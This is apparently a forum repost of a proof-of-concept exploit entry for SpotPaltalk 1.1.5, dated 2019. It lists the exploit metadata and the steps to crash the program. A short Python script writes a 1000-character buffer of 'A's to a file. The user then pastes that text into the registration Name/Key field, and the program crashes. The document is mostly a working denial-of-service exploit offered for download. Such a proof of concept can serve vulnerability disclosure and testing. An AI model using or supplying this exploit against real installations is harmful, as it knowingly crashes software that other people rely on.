SpotPaltalk 1.1.5 Denial Of Service

  1. 3 months ago

    h107.png

    SpotPaltalk version 1.1.5 denial of service proof of concept exploit.

    MD5 | ada11719de2ceaf0113cb48f95e3a6f0

    Download => spotpaltalk115-dos.txt

    # -*- coding: utf-8 -*-
    # Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
    # Date: 09/05/2019
    # Author: Alejandra Sánchez
    # Vendor Homepage: http://www.nsauditor.com
    # Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
    # Version: 1.1.5
    # Tested on: Windows 10
    
    # Proof of Concept:
    # 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
    # 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
    # 3.- Open SpotPalTalk
    # 4.  Select "Register" > "Enter Registration Code..."
    # 5.- Paste clipboard in the Name/Key field 
    # 6.- Click 'OK'
    # 7.- Crashed
    
    buffer = "\x41" * 1000
    f = open ("SpotPaltalk.txt", "w")
    f.write(buffer)
    f.close()
 

or Sign Up to reply!